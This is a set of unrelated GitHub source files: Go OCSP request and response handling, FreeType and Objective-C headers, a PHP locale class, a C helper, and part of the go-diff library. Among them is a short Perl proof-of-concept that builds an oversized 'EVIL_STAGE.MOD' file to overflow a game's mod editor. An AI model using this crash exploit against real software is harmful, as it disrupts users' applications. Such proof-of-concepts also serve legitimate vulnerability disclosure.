{x509.DSAWithSHA256, oidSignatureDSAWithSHA256, x509.DSA, crypto.SHA256},
{x509.ECDSAWithSHA1, oidSignatureECDSAWithSHA1, x509.ECDSA, crypto.SHA1},
{x509.ECDSAWithSHA256, oidSignatureECDSAWithSHA256, x509.ECDSA, crypto.SHA256},
{x509.ECDSAWithSHA384, oidSignatureECDSAWithSHA384, x509.ECDSA, crypto.SHA384},
{x509.ECDSAWithSHA512, oidSignatureECDSAWithSHA512, x509.ECDSA, crypto.SHA512},
}
// TODO(rlb): This is also from crypto/x509, so same comment as AGL's below
func signingParamsForPublicKey(pub interface{}, requestedSigAlgo x509.SignatureAlgorithm) (hashFunc crypto.Hash, sigAlgo pkix.AlgorithmIdentifier, err error) {
var pubType x509.PublicKeyAlgorithm
switch pub := pub.(type) {
case *rsa.PublicKey:
pubType = x509.RSA
hashFunc = crypto.SHA256
sigAlgo.Algorithm = oidSignatureSHA256WithRSA
sigAlgo.Parameters = asn1.RawValue{
Tag: 5,
}
case *ecdsa.PublicKey:
pubType = x509.ECDSA
switch pub.Curve {
case elliptic.P224(), elliptic.P256():
hashFunc = crypto.SHA256
sigAlgo.Algorithm = oidSignatureECDSAWithSHA256
case elliptic.P384():
hashFunc = crypto.SHA384
sigAlgo.Algorithm = oidSignatureECDSAWithSHA384
case elliptic.P521():
hashFunc = crypto.SHA512
sigAlgo.Algorithm = oidSignatureECDSAWithSHA512
default:
err = errors.New("x509: unknown elliptic curve")
}
default:
err = errors.New("x509: only RSA and ECDSA keys supported")
}
if err != nil {
return
}
if requestedSigAlgo == 0 {
return
}
found := false
for _, details := range signatureAlgorithmDetails {
if details.algo == requestedSigAlgo {
if details.pubKeyAlgo != pubType {
err = errors.New("x509: requested SignatureAlgorithm does not match private key type")
return
}
sigAlgo.Algorithm, hashFunc = details.oid, details.hash
if hashFunc == 0 {
err = errors.New("x509: cannot sign with hash function requested")
return
}
found = true
break
}
}
if !found {
err = errors.New("x509: unknown SignatureAlgorithm")
}
return
}
// TODO(agl): this is taken from crypto/x509 and so should probably be exported
// from crypto/x509 or crypto/x509/pkix.
func getSignatureAlgorithmFromOID(oid asn1.ObjectIdentifier) x509.SignatureAlgorithm {
for _, details := range signatureAlgorithmDetails {
if oid.Equal(details.oid) {
return details.algo
}
}
return x509.UnknownSignatureAlgorithm
}
// TODO(rlb): This is not taken from crypto/x509, but it's of the same general form.
func getHashAlgorithmFromOID(target asn1.ObjectIdentifier) crypto.Hash {
for hash, oid := range hashOIDs {
if oid.Equal(target) {
return hash
}
}
return crypto.Hash(0)
}
func getOIDFromHashAlgorithm(target crypto.Hash) asn1.ObjectIdentifier {
for hash, oid := range hashOIDs {
if hash == target {
return oid
}
}
return nil
}
// This is the exposed reflection of the internal OCSP structures.
// The status values that can be expressed in OCSP. See RFC 6960.
const (
// Good means that the certificate is valid.
Good = iota
// Revoked means that the certificate has been deliberately revoked.
Revoked
// Unknown means that the OCSP responder doesn't know about the certificate.
Unknown
// ServerFailed is unused and was never used (see
// https://go-review.googlesource.com/#/c/18944). ParseResponse will
// return a ResponseError when an error response is parsed.
ServerFailed
)
// The enumerated reasons for revoking a certificate. See RFC 5280.
const (
Unspecified = 0
KeyCompromise = 1
CACompromise = 2
AffiliationChanged = 3
Superseded = 4
CessationOfOperation = 5
CertificateHold = 6
RemoveFromCRL = 8
PrivilegeWithdrawn = 9
AACompromise = 10
)
// Request represents an OCSP request. See RFC 6960.
type Request struct {
HashAlgorithm crypto.Hash
IssuerNameHash []byte
IssuerKeyHash []byte
SerialNumber *big.Int
}
// Marshal marshals the OCSP request to ASN.1 DER encoded form.
func (req *Request) Marshal() ([]byte, error) {
hashAlg := getOIDFromHashAlgorithm(req.HashAlgorithm)
if hashAlg == nil {
return nil, errors.New("Unknown hash algorithm")
}
return asn1.Marshal(ocspRequest{
tbsRequest{
Version: 0,
RequestList: []request{
{
Cert: certID{
pkix.AlgorithmIdentifier{
Algorithm: hashAlg,
Parameters: asn1.RawValue{Tag: 5 /* ASN.1 NULL */},
},
req.IssuerNameHash,
req.IssuerKeyHash,
req.SerialNumber,
},
},
},
},
})
}
// Response represents an OCSP response containing a single SingleResponse. See
// RFC 6960.
type Response struct {
// Status is one of {Good, Revoked, Unknown}
Status int
SerialNumber *big.Int
ProducedAt, ThisUpdate, NextUpdate, RevokedAt time.Time
RevocationReason int
Certificate *x509.Certificate
// TBSResponseData contains the raw bytes of the signed response. If
// Certificate is nil then this can be used to verify Signature.
TBSResponseData []byte
Signature []byte
SignatureAlgorithm x509.SignatureAlgorithm
// IssuerHash is the hash used to compute the IssuerNameHash and IssuerKeyHash.
// Valid values are crypto.SHA1, crypto.SHA256, crypto.SHA384, and crypto.SHA512.
// If zero, the default is crypto.SHA1.
IssuerHash crypto.Hash
// RawResponderName optionally contains the DER-encoded subject of the
// responder certificate. Exactly one of RawResponderName and
// ResponderKeyHash is set.
RawResponderName []byte
// ResponderKeyHash optionally contains the SHA-1 hash of the
// responder's public key. Exactly one of RawResponderName and
// ResponderKeyHash is set.
ResponderKeyHash []byte
// Extensions contains raw X.509 extensions from the singleExtensions field
// of the OCSP response. When parsing certificates, this can be used to
// extract non-critical extensions that are not parsed by this package. When
// marshaling OCSP responses, the Extensions field is ignored, see
// ExtraExtensions.
Extensions []pkix.Extension
// ExtraExtensions contains extensions to be copied, raw, into any marshaled
// OCSP response (in the singleExtensions field). Values override any
// extensions that would otherwise be produced based on the other fields. The
// ExtraExtensions field is not populated when parsing certificates, see
// Extensions.
ExtraExtensions []pkix.Extension
}
// These are pre-serialized error responses for the various non-success codes
// defined by OCSP. The Unauthorized code in particular can be used by an OCSP
// responder that supports only pre-signed responses as a response to requests
// for certificates with unknown status. See RFC 5019.
var (
MalformedRequestErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x01}
InternalErrorErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x02}
TryLaterErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x03}
SigRequredErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x05}
UnauthorizedErrorResponse = []byte{0x30, 0x03, 0x0A, 0x01, 0x06}
)
// CheckSignatureFrom checks that the signature in resp is a valid signature
// from issuer. This should only be used if resp.Certificate is nil. Otherwise,
// the OCSP response contained an intermediate certificate that created the
// signature. That signature is checked by ParseResponse and only
// resp.Certificate remains to be validated.
func (resp *Response) CheckSignatureFrom(issuer *x509.Certificate) error {
return issuer.CheckSignature(resp.SignatureAlgorithm, resp.TBSResponseData, resp.Signature)
}
// ParseError results from an invalid OCSP response.
type ParseError string
func (p ParseError) Error() string {
return string(p)
}
// ParseRequest parses an OCSP request in DER form. It only supports
// requests for a single certificate. Signed requests are not supported.
// If a request includes a signature, it will result in a ParseError.
func ParseRequest(bytes []byte) (*Request, error) {
var req ocspRequest
rest, err := asn1.Unmarshal(bytes, &req)
if err != nil {
return nil, err
}
if len(rest) > 0 {
return nil, ParseError("trailing data in OCSP request")
}
if len(req.TBSRequest.RequestList) == 0 {
return nil, ParseError("OCSP request contains no request body")
}
innerRequest := req.TBSRequest.RequestList[0]
hashFunc := getHashAlgorithmFromOID(innerRequest.Cert.HashAlgorithm.Algorithm)
if hashFunc == crypto.Hash(0) {
return nil, ParseError("OCSP request uses unknown hash function")
}
return &Request{
HashAlgorithm: hashFunc,
IssuerNameHash: innerRequest.Cert.NameHash,
IssuerKeyHash: innerRequest.Cert.IssuerKeyHash,
SerialNumber: innerRequest.Cert.SerialNumber,
}, nil
}
// ParseResponse parses an OCSP response in DER form. It only supports
// responses for a single certificate. If the response contains a certificate
// then the signature over the response is checked. If issuer is not nil then
// it will be used to validate the signature or embedded certificate.
//
// Invalid responses and parse failures will result in a ParseError.
// Error responses will result in a ResponseError.
func ParseResponse(bytes []byte, issuer *x509.Certificate) (*Response, error) {
return ParseResponseForCert(bytes, nil, issuer)
}
// ParseResponseForCert parses an OCSP response in DER form and searches for a
// Response relating to cert. If such a Response is found and the OCSP response
// contains a certificate then the signature over the response is checked. If
// issuer is not nil then it will be used to validate the signature or embedded
// certificate.
//
// Invalid responses and parse failures will result in a ParseError.
// Error responses will result in a ResponseError.
func ParseResponseForCert(bytes []byte, cert, issuer *x509.Certificate) (*Response, error) {
var resp responseASN1
rest, err := asn1.Unmarshal(bytes, &resp)
if err != nil {
return nil, err
}
if len(rest) > 0 {
return nil, ParseError("trailing data in OCSP response")
}
if status := ResponseStatus(resp.Status); status != Success {
return nil, ResponseError{status}
}
if !resp.Response.ResponseType.Equal(idPKIXOCSPBasic) {
return nil, ParseError("bad OCSP response type")
}
var basicResp basicResponse
rest, err = asn1.Unmarshal(resp.Response.Response, &basicResp)
if err != nil {
return nil, err
}
if n := len(basicResp.TBSResponseData.Responses); n == 0 || cert == nil && n > 1 {
return nil, ParseError("OCSP response contains bad number of responses")
}
var singleResp singleResponse
if cert == nil {
singleResp = basicResp.TBSResponseData.Responses[0]
} else {
match := false
for _, resp := range basicResp.TBSResponseData.Responses {
if cert.SerialNumber.Cmp(resp.CertID.SerialNumber) == 0 {
singleResp = resp
match = true
break
}
}
if !match {
return nil, ParseError("no response matching the supplied certificate")
}
}
ret := &Response{
TBSResponseData: basicResp.TBSResponseData.Raw,
Signature: basicResp.Signature.RightAlign(),
SignatureAlgorithm: getSignatureAlgorithmFromOID(basicResp.SignatureAlgorithm.Algorithm),
Extensions: singleResp.SingleExtensions,
SerialNumber: singleResp.CertID.SerialNumber,
ProducedAt: basicResp.TBSResponseData.ProducedAt,
ThisUpdate: singleResp.ThisUpdate,
NextUpdate: singleResp.NextUpdate,
}
// Handle the ResponderID CHOICE tag. ResponderID can be flattened into
// TBSResponseData once https://go-review.googlesource.com/34503 has been
// released.
rawResponderID := basicResp.TBSResponseData.RawResponderID
switch rawResponderID.Tag {
case 1: // Name
var rdn pkix.RDNSequence
if rest, err := asn1.Unmarshal(rawResponderID.Bytes, &rdn); err != nil || len(rest) != 0 {
return nil, ParseError("invalid responder name")
}
ret.RawResponderName = rawResponderID.Bytes
case 2: // KeyHash
if rest, err := asn1.Unmarshal(rawResponderID.Bytes, &ret.ResponderKeyHash); err != nil || len(rest) != 0 {
return nil, ParseError("invalid responder key hash")
}
default:
return nil, ParseError("invalid responder id tag")
}
if len(basicResp.Certificates) > 0 {
// Responders should only send a single certificate (if they
// send any) that connects the responder's certificate to the
// original issuer. We accept responses with multiple
// certificates due to a number responders sending them[1], but
// ignore all but the first.
//
// [1] https://github.com/golang/go/issues/21527
ret.Certificate, err = x509.ParseCertificate(basicResp.Certificates[0].FullBytes)
if err != nil {
return nil, err
}
if err := ret.CheckSignatureFrom(ret.Certificate); err != nil {
return nil, ParseError("bad signature on embedded certificate: " + err.Error())
}
if issuer != nil {
if err := issuer.CheckSignature(ret.Certificate.SignatureAlgorithm, ret.Certificate.RawTBSCertificate, ret.Certificate.Signature); err != nil {
return nil, ParseError("bad OCSP signature: " + err.Error())
}
}
} else if issuer != nil {
if err := ret.CheckSignatureFrom(issuer); err != nil {
return nil, ParseError("bad OCSP signature: " + err.Error())
}
}
for _, ext := range singleResp.SingleExtensions {
if ext.Critical {
return nil, ParseError("unsupported critical extension")
}
}
for h, oid := range hashOIDs {
if singleResp.CertID.HashAlgorithm.Algorithm.Equal(oid) {
ret.IssuerHash = h
break
}
}
if ret.IssuerHash == 0 {
return nil, ParseError("unsupported issuer hash algorithm")
}
switch {
case bool(singleResp.Good):
ret.Status = Good
case bool(singleResp.Unknown):
ret.Status = Unknown
default:
ret.Status = Revoked
ret.RevokedAt = singleResp.Revoked.RevocationTime
ret.RevocationReason = int(singleResp.Revoked.Reason)
}
return ret, nil
}
// RequestOptions contains options for constructing OCSP requests.
type RequestOptions struct {
// Hash contains the hash function that should be used when
// constructing the OCSP request. If zero, SHA-1 will be used.
Hash crypto.Hash
}
func (opts *RequestOptions) hash() crypto.Hash {
if opts == nil || opts.Hash == 0 {
// SHA-1 is nearly universally used in OCSP.
return crypto.SHA1
}
return opts.Hash
}
// CreateRequest returns a DER-encoded, OCSP request for the status of cert. If
// opts is nil then sensible defaults are used.
func CreateRequest(cert, issuer *x509.Certificate, opts *RequestOptions) ([]byte, error) {
hashFunc := opts.hash()
// OCSP seems to be the only place where these raw hash identifiers are
// used. I took the following from
// http://msdn.microsoft.com/en-us/library/ff635603.aspx
_, ok := hashOIDs[hashFunc]
if !ok {
return nil, x509.ErrUnsupportedAlgorithm
}
if !hashFunc.Available() {
return nil, x509.ErrUnsupportedAlgorithm
}
h := opts.hash().New()
var publicKeyInfo struct {
Algorithm pkix.AlgorithmIdentifier
PublicKey asn1.BitString
}
if _, err := asn1.Unmarshal(issuer.RawSubjectPublicKeyInfo, &publicKeyInfo); err != nil {
return nil, err
}
h.Write(publicKeyInfo.PublicKey.RightAlign())
issuerKeyHash := h.Sum(nil)
h.Reset()
h.Write(issuer.RawSubject)
issuerNameHash := h.Sum(nil)
req := &Request{
HashAlgorithm: hashFunc,
IssuerNameHash: issuerNameHash,
IssuerKeyHash: issuerKeyHash,
SerialNumber: cert.SerialNumber,
}
return req.Marshal()
}
// CreateResponse returns a DER-encoded OCSP response with the specified contents.
// The fields in the response are populated as follows:
//
// The responder cert is used to populate the responder's name field, and the
// certificate itself is provided alongside the OCSP response signature.
//
// The issuer cert is used to puplate the IssuerNameHash and IssuerKeyHash fields.
//
// The template is used to populate the SerialNumber, Status, RevokedAt,
// RevocationReason, ThisUpdate, and NextUpdate fields.
//
// If template.IssuerHash is not set, SHA1 will be used.
//
// The ProducedAt date is automatically set to the current date, to the nearest minute.
func CreateResponse(issuer, responderCert *x509.Certificate, template Response, priv crypto.Signer) ([]byte, error) {
var publicKeyInfo struct {
Algorithm pkix.AlgorithmIdentifier
PublicKey asn1.BitString
}
if _, err := asn1.Unmarshal(issuer.RawSubjectPublicKeyInfo, &publicKeyInfo); err != nil {
return nil, err
}
if template.IssuerHash == 0 {
template.IssuerHash = crypto.SHA1
}
hashOID := getOIDFromHashAlgorithm(template.IssuerHash)
if hashOID == nil {
return nil, errors.New("unsupported issuer hash algorithm")
}
if !template.IssuerHash.Available() {
return nil, fmt.Errorf("issuer hash algorithm %v not linked into binary", template.IssuerHash)
}
h := template.IssuerHash.New()
h.Write(publicKeyInfo.PublicKey.RightAlign())
issuerKeyHash := h.Sum(nil)
h.Reset()
h.Write(issuer.RawSubject)
issuerNameHash := h.Sum(nil)
innerResponse := singleResponse{
CertID: certID{
HashAlgorithm: pkix.AlgorithmIdentifier{
Algorithm: hashOID,
Parameters: asn1.RawValue{Tag: 5 /* ASN.1 NULL */},
},
NameHash: issuerNameHash,
IssuerKeyHash: issuerKeyHash,
SerialNumber: template.SerialNumber,
},
ThisUpdate: template.ThisUpdate.UTC(),
NextUpdate: template.NextUpdate.UTC(),
SingleExtensions: template.ExtraExtensions,
}
switch template.Status {
case Good:
innerResponse.Good = true
case Unknown:
innerResponse.Unknown = true
case Revoked:
innerResponse.Revoked = revokedInfo{
RevocationTime: template.RevokedAt.UTC(),
Reason: asn1.Enumerated(template.RevocationReason),
}
}
rawResponderID := asn1.RawValue{
Class: 2, // context-specific
Tag: 1, // Name (explicit tag)
IsCompound: true,
Bytes: responderCert.RawSubject,
}
tbsResponseData := responseData{
Version: 0,
RawResponderID: rawResponderID,
ProducedAt: time.Now().Truncate(time.Minute).UTC(),
Responses: []singleResponse{innerResponse},
}
tbsResponseDataDER, err := asn1.Marshal(tbsResponseData)
if err != nil {
return nil, err
}
hashFunc, signatureAlgorithm, err := signingParamsForPublicKey(priv.Public(), template.SignatureAlgorithm)
if err != nil {
return nil, err
}
responseHash := hashFunc.New()
responseHash.Write(tbsResponseDataDER)
signature, err := priv.Sign(rand.Reader, responseHash.Sum(nil), hashFunc)
if err != nil {
return nil, err
}
response := basicResponse{
TBSResponseData: tbsResponseData,
SignatureAlgorithm: signatureAlgorithm,
Signature: asn1.BitString{
Bytes: signature,
BitLength: 8 * len(signature),
},
}
if template.Certificate != nil {
response.Certificates = []asn1.RawValue{
{FullBytes: template.Certificate.Raw},
}
}
responseDER, err := asn1.Marshal(response)
if err != nil {
return nil, err
}
return asn1.Marshal(responseASN1{
Status: asn1.Enumerated(Success),
Response: responseBytes{
ResponseType: idPKIXOCSPBasic,
Response: responseDER,
},
})
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/perl
# Title : Hacker Evolution: untold Mod Editor buffer overflow
# Date : June 19, 2010
# Author : gunslinger_ <[email protected]>
# Web : http://devilzc0de.com
# Blog : http://gunslingerc0de.wordpress.com
# Software Link : http://www.exosyphen.com/page_hacker-evolution-untold.html
# Version : 2.00.001
# Tested on : Windows XP SP2
# Open Hacker Evolution Mod editor -> open file -> EVIL_STAGE.MOD
my $file= "EVIL_STAGE.MOD";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "MOD File Created successfully\n";
| {
"pile_set_name": "Github"
} |
//
// ______ ______ ______
// /\ __ \ /\ ___\ /\ ___\
// \ \ __< \ \ __\_ \ \ __\_
// \ \_____\ \ \_____\ \ \_____\
// \/_____/ \/_____/ \/_____/
//
// Copyright (c) 2013 BEE creators
// http://www.whatsbug.com
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the "Software"),
// to deal in the Software without restriction, including without limitation
// the rights to use, copy, modify, merge, publish, distribute, sublicense,
// and/or sell copies of the Software, and to permit persons to whom the
// Software is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
// IN THE SOFTWARE.
//
//
// Bee_UIMatrixView.h
//
#if (TARGET_OS_IPHONE || TARGET_IPHONE_SIMULATOR)
#import "Bee_Precompile.h"
#import "Bee_UISignal.h"
#pragma mark -
@class BeeUIMatrixView;
@protocol BeeUIMatrixViewDataSource
- (CGSize)sizeOfViewForMatrixView:(BeeUIMatrixView *)matrixView;
- (NSInteger)numberOfRowsInMatrixView:(BeeUIMatrixView *)matrixView;
- (NSInteger)numberOfColsInMatrixView:(BeeUIMatrixView *)matrixView;
- (UIView *)matrixView:(BeeUIMatrixView *)matrixView row:(NSInteger)row col:(NSInteger)col;
@end
@interface BeeUIMatrixView : UIScrollView<BeeUIMatrixViewDataSource, UIScrollViewDelegate>
{
id _dataSource;
NSInteger _rowTotal;
NSInteger _colTotal;
CGSize _itemSize;
NSRange _rowVisibleRange;
NSRange _colVisibleRange;
NSMutableArray * _items;
BOOL _shouldNotify;
BOOL _reachTop;
BOOL _reachBottom;
BOOL _reachLeft;
BOOL _reachRight;
BOOL _reloaded;
BOOL _reloading;
UIEdgeInsets _baseInsets;
NSMutableArray * _reuseQueue;
CGPoint _scrollSpeed;
CGPoint _lastOffset;
NSTimeInterval _lastOffsetCapture;
}
@property (nonatomic, assign) id dataSource;
@property (nonatomic, readonly) NSInteger rowTotal;
@property (nonatomic, readonly) NSInteger colTotal;
@property (nonatomic, readonly) NSRange rowVisibleRange;
@property (nonatomic, readonly) NSRange colVisibleRange;
@property (nonatomic, readonly) NSMutableArray * items;
@property (nonatomic, readonly) BOOL reachTop;
@property (nonatomic, readonly) BOOL reachBottom;
@property (nonatomic, readonly) BOOL reachLeft;
@property (nonatomic, readonly) BOOL reachRight;
@property (nonatomic, assign) BOOL reloaded;
@property (nonatomic, readonly) BOOL reloading;
@property (nonatomic, retain) NSMutableArray * reuseQueue;
@property (nonatomic, readonly) CGPoint scrollSpeed;
AS_SIGNAL( RELOADED ) // 数据重新加载
AS_SIGNAL( REACH_TOP ) // 触顶
AS_SIGNAL( REACH_BOTTOM ) // 触底
AS_SIGNAL( REACH_LEFT ) // 触左边
AS_SIGNAL( REACH_RIGHT ) // 触右边
AS_SIGNAL( DID_STOP )
AS_SIGNAL( DID_SCROLL )
+ (BeeUIMatrixView *)spawn;
+ (BeeUIMatrixView *)spawn:(NSString *)tagString;
- (id)dequeueWithContentClass:(Class)clazz;
- (void)setBaseInsets:(UIEdgeInsets)insets;
- (UIEdgeInsets)getBaseInsets;
- (void)reloadData;
- (void)syncReloadData;
- (void)asyncReloadData;
- (void)cancelReloadData;
@end
#endif // #if (TARGET_OS_IPHONE || TARGET_IPHONE_SIMULATOR)
| {
"pile_set_name": "Github"
} |
/***************************************************************************/
/* */
/* tterrors.h */
/* */
/* TrueType error codes (specification only). */
/* */
/* Copyright 2001, 2012 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
/*************************************************************************/
/* */
/* This file is used to define the TrueType error enumeration */
/* constants. */
/* */
/*************************************************************************/
#ifndef __TTERRORS_H__
#define __TTERRORS_H__
#include FT_MODULE_ERRORS_H
#undef __FTERRORS_H__
#undef FT_ERR_PREFIX
#define FT_ERR_PREFIX TT_Err_
#define FT_ERR_BASE FT_Mod_Err_TrueType
#include FT_ERRORS_H
#endif /* __TTERRORS_H__ */
/* END */
| {
"pile_set_name": "Github"
} |
<?php
namespace Fisharebest\Localization\Locale;
/**
* Class LocaleYueHans - Yue
*
* @author Greg Roach <[email protected]>
* @copyright (c) 2019 Greg Roach
* @license GPLv3+
*/
class LocaleYueHans extends LocaleYue
{
public function endonym()
{
return '粤语';
}
}
| {
"pile_set_name": "Github"
} |
/***********************************************************************
* *
* This software is part of the ast package *
* Copyright (c) 2000-2011 AT&T Intellectual Property *
* and is licensed under the *
* Eclipse Public License, Version 1.0 *
* by AT&T Intellectual Property *
* *
* A copy of the License is available at *
* http://www.eclipse.org/org/documents/epl-v10.html *
* (with md5 checksum b35adb5213ca9657e911e9befb180842) *
* *
* Information and Software Systems Research *
* AT&T Research *
* Florham Park NJ *
* *
* Glenn Fowler <[email protected]> *
* Phong Vo <[email protected]> *
* *
***********************************************************************/
#pragma prototyped
#include "ptvlib.h"
/*
* return the minimum prefix of a limited to m bits
*/
unsigned char*
ptvmin(int z, unsigned char* r, const unsigned char* a, int m)
{
return fvplo(z, m, r, a);
}
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2012-2016 The go-diff authors. All rights reserved.
// https://github.com/sergi/go-diff
// See the included LICENSE file for license details.
//
// go-diff is a Go implementation of Google's Diff, Match, and Patch library
// Original library is Copyright (c) 2006 Google Inc.
// http://code.google.com/p/google-diff-match-patch/
package diffmatchpatch
import (
"bytes"
"errors"
"fmt"
"html"
"math"
"net/url"
"regexp"
"strconv"
"strings"
"time"
"unicode/utf8"
)
// Operation defines the operation of a diff item.
type Operation int8
const (
// DiffDelete item represents a delete diff.
DiffDelete Operation = -1
// DiffInsert item represents an insert diff.
DiffInsert Operation = 1
// DiffEqual item represents an equal diff.
DiffEqual Operation = 0
)
// Diff represents one diff operation
type Diff struct {
Type Operation
Text string
}
func splice(slice []Diff, index int, amount int, elements ...Diff) []Diff {
return append(slice[:index], append(elements, slice[index+amount:]...)...)
}
// DiffMain finds the differences between two texts.
// If an invalid UTF-8 sequence is encountered, it will be replaced by the Unicode replacement character.
func (dmp *DiffMatchPatch) DiffMain(text1, text2 string, checklines bool) []Diff {
return dmp.DiffMainRunes([]rune(text1), []rune(text2), checklines)
}
// DiffMainRunes finds the differences between two rune sequences.
// If an invalid UTF-8 sequence is encountered, it will be replaced by the Unicode replacement character.
func (dmp *DiffMatchPatch) DiffMainRunes(text1, text2 []rune, checklines bool) []Diff {
var deadline time.Time
if dmp.DiffTimeout > 0 {
deadline = time.Now().Add(dmp.DiffTimeout)
}
return dmp.diffMainRunes(text1, text2, checklines, deadline)
}
func (dmp *DiffMatchPatch) diffMainRunes(text1, text2 []rune, checklines bool, deadline time.Time) []Diff {
if runesEqual(text1, text2) {
var diffs []Diff
if len(text1) > 0 {
diffs = append(diffs, Diff{DiffEqual, string(text1)})
}
return diffs
}
// Trim off common prefix (speedup).
commonlength := commonPrefixLength(text1, text2)
commonprefix := text1[:commonlength]
text1 = text1[commonlength:]
text2 = text2[commonlength:]
// Trim off common suffix (speedup).
commonlength = commonSuffixLength(text1, text2)
commonsuffix := text1[len(text1)-commonlength:]
text1 = text1[:len(text1)-commonlength]
text2 = text2[:len(text2)-commonlength]
// Compute the diff on the middle block.
diffs := dmp.diffCompute(text1, text2, checklines, deadline)
// Restore the prefix and suffix.
if len(commonprefix) != 0 {
diffs = append([]Diff{Diff{DiffEqual, string(commonprefix)}}, diffs...)
}
if len(commonsuffix) != 0 {
diffs = append(diffs, Diff{DiffEqual, string(commonsuffix)})
}
return dmp.DiffCleanupMerge(diffs)
}
// diffCompute finds the differences between two rune slices. Assumes that the texts do not have any common prefix or suffix.
func (dmp *DiffMatchPatch) diffCompute(text1, text2 []rune, checklines bool, deadline time.Time) []Diff {
diffs := []Diff{}
if len(text1) == 0 {
// Just add some text (speedup).
return append(diffs, Diff{DiffInsert, string(text2)})
} else if len(text2) == 0 {
// Just delete some text (speedup).
return append(diffs, Diff{DiffDelete, string(text1)})
}
var longtext, shorttext []rune
if len(text1) > len(text2) {
longtext = text1
shorttext = text2
} else {
longtext = text2
shorttext = text1
}
if i := runesIndex(longtext, shorttext); i != -1 {
op := DiffInsert
// Swap insertions for deletions if diff is reversed.
if len(text1) > len(text2) {
op = DiffDelete
}
// Shorter text is inside the longer text (speedup).
return []Diff{
Diff{op, string(longtext[:i])},
Diff{DiffEqual, string(shorttext)},
Diff{op, string(longtext[i+len(shorttext):])},
}
} else if len(shorttext) == 1 {
// Single character string.
// After the previous speedup, the character can't be an equality.
return []Diff{
Diff{DiffDelete, string(text1)},
Diff{DiffInsert, string(text2)},
}
// Check to see if the problem can be split in two.
} else if hm := dmp.diffHalfMatch(text1, text2); hm != nil {
// A half-match was found, sort out the return data.
text1A := hm[0]
text1B := hm[1]
text2A := hm[2]
text2B := hm[3]
midCommon := hm[4]
// Send both pairs off for separate processing.
diffsA := dmp.diffMainRunes(text1A, text2A, checklines, deadline)
diffsB := dmp.diffMainRunes(text1B, text2B, checklines, deadline)
// Merge the results.
return append(diffsA, append([]Diff{Diff{DiffEqual, string(midCommon)}}, diffsB...)...)
} else if checklines && len(text1) > 100 && len(text2) > 100 {
return dmp.diffLineMode(text1, text2, deadline)
}
return dmp.diffBisect(text1, text2, deadline)
}
// diffLineMode does a quick line-level diff on both []runes, then rediff the parts for greater accuracy. This speedup can produce non-minimal diffs.
func (dmp *DiffMatchPatch) diffLineMode(text1, text2 []rune, deadline time.Time) []Diff {
// Scan the text on a line-by-line basis first.
text1, text2, linearray := dmp.diffLinesToRunes(text1, text2)
diffs := dmp.diffMainRunes(text1, text2, false, deadline)
// Convert the diff back to original text.
diffs = dmp.DiffCharsToLines(diffs, linearray)
// Eliminate freak matches (e.g. blank lines)
diffs = dmp.DiffCleanupSemantic(diffs)
// Rediff any replacement blocks, this time character-by-character.
// Add a dummy entry at the end.
diffs = append(diffs, Diff{DiffEqual, ""})
pointer := 0
countDelete := 0
countInsert := 0
// NOTE: Rune slices are slower than using strings in this case.
textDelete := ""
textInsert := ""
for pointer < len(diffs) {
switch diffs[pointer].Type {
case DiffInsert:
countInsert++
textInsert += diffs[pointer].Text
case DiffDelete:
countDelete++
textDelete += diffs[pointer].Text
case DiffEqual:
// Upon reaching an equality, check for prior redundancies.
if countDelete >= 1 && countInsert >= 1 {
// Delete the offending records and add the merged ones.
diffs = splice(diffs, pointer-countDelete-countInsert,
countDelete+countInsert)
pointer = pointer - countDelete - countInsert
a := dmp.diffMainRunes([]rune(textDelete), []rune(textInsert), false, deadline)
for j := len(a) - 1; j >= 0; j-- {
diffs = splice(diffs, pointer, 0, a[j])
}
pointer = pointer + len(a)
}
countInsert = 0
countDelete = 0
textDelete = ""
textInsert = ""
}
pointer++
}
return diffs[:len(diffs)-1] // Remove the dummy entry at the end.
}
// DiffBisect finds the 'middle snake' of a diff, split the problem in two and return the recursively constructed diff.
// If an invalid UTF-8 sequence is encountered, it will be replaced by the Unicode replacement character.
// See Myers 1986 paper: An O(ND) Difference Algorithm and Its Variations.
func (dmp *DiffMatchPatch) DiffBisect(text1, text2 string, deadline time.Time) []Diff {
// Unused in this code, but retained for interface compatibility.
return dmp.diffBisect([]rune(text1), []rune(text2), deadline)
}
// diffBisect finds the 'middle snake' of a diff, splits the problem in two and returns the recursively constructed diff.
// See Myers's 1986 paper: An O(ND) Difference Algorithm and Its Variations.
func (dmp *DiffMatchPatch) diffBisect(runes1, runes2 []rune, deadline time.Time) []Diff {
// Cache the text lengths to prevent multiple calls.
runes1Len, runes2Len := len(runes1), len(runes2)
maxD := (runes1Len + runes2Len + 1) / 2
vOffset := maxD
vLength := 2 * maxD
v1 := make([]int, vLength)
v2 := make([]int, vLength)
for i := range v1 {
v1[i] = -1
v2[i] = -1
}
v1[vOffset+1] = 0
v2[vOffset+1] = 0
delta := runes1Len - runes2Len
// If the total number of characters is odd, then the front path will collide with the reverse path.
front := (delta%2 != 0)
// Offsets for start and end of k loop. Prevents mapping of space beyond the grid.
k1start := 0
k1end := 0
k2start := 0
k2end := 0
